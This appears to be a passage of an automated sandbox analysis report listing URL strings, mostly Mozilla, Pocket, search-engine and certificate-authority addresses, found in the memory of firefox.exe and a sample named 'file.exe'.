Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000021.00000003.3152588745.00000169CE4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3392258143.00000169CAECB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141099492.00000169D9BFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000021.00000003.3414144429.00000169CAEB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000021.00000003.3391044621.00000169CAF2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000021.00000003.3391044621.00000169CAF2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000021.00000003.3403954817.00000169CC1E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3228876656.00000169CA6E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3273698360.00000169CAAC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3039034257.00000169C6F3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066433550.00000169D9DE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277818578.00000169CAAE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386641479.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3286136241.00000169CAAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBD68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3080819409.00000169D9EF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3393234826.00000169CC1E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3309306098.00000169CC1E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948970212.00000169CA6F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3287194679.00000169CA6D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3268103076.00000169D9FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3287194679.00000169CA6E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3073977083.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3037729550.00000169D9EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3378661571.00000169D96A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000021.00000003.3336058593.00000169D393C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336058593.00000169D393C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: file.exe, file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000021.00000003.3239953611.00000169D3982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3123371774.00000169C9EC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245539528.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBD43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3151922615.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3260285389.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245539528.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3151922615.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: file.exe, 00000000.00000002.2446727241.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000021.00000003.3233159876.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3381137545.00000169CD9B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3248971153.00000169CD9B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000021.00000003.3378661571.00000169D96A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5FE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239255232.00000169D5FE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000021.00000003.3396520559.00000169D34FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: chromecache_259.35.dr String found in binary or memory: https://apis.google.com/js/api.js
Source: firefox.exe, 00000021.00000003.3344434976.00000169CE481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000021.00000003.3416346439.00000169CAC5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000021.00000003.3389754862.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400899355.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413469989.00000169CAF89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Win
Source: firefox.exe, 00000021.00000003.3389754862.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400899355.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413469989.00000169CAF89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/re
Source: firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3157569738.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3254249599.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3257562106.00000169CC3E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB2CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3301896945.00000169CB3C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3301896945.00000169CB3C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000021.00000003.2928245347.00000169C974A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000021.00000003.3346404548.00000169CE43E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3115451545.00000169D9D82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3233159876.00000169D9B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3233159876.00000169D9B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000021.00000003.3114351181.00000169C552F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.c
Source: firefox.exe, 00000021.00000003.3038682023.00000169C91F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2928245347.00000169C974A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3185884753.00000169C91ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2945016506.00000169C91EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277423636.00000169C91F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2947727830.00000169C91EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3180848260.00000169C91F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9955000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3304973847.00000169CC1E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000021.00000003.3228316187.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3304973847.00000169CC1E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197600394.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3305729719.00000169CAD1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3263880810.00000169CA0FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000021.00000003.3220435804.00000169D9FBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000021.00000003.3343769364.00000169CE4FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3401672896.00000169CAE81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000021.00000003.3391531439.00000169CAEF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
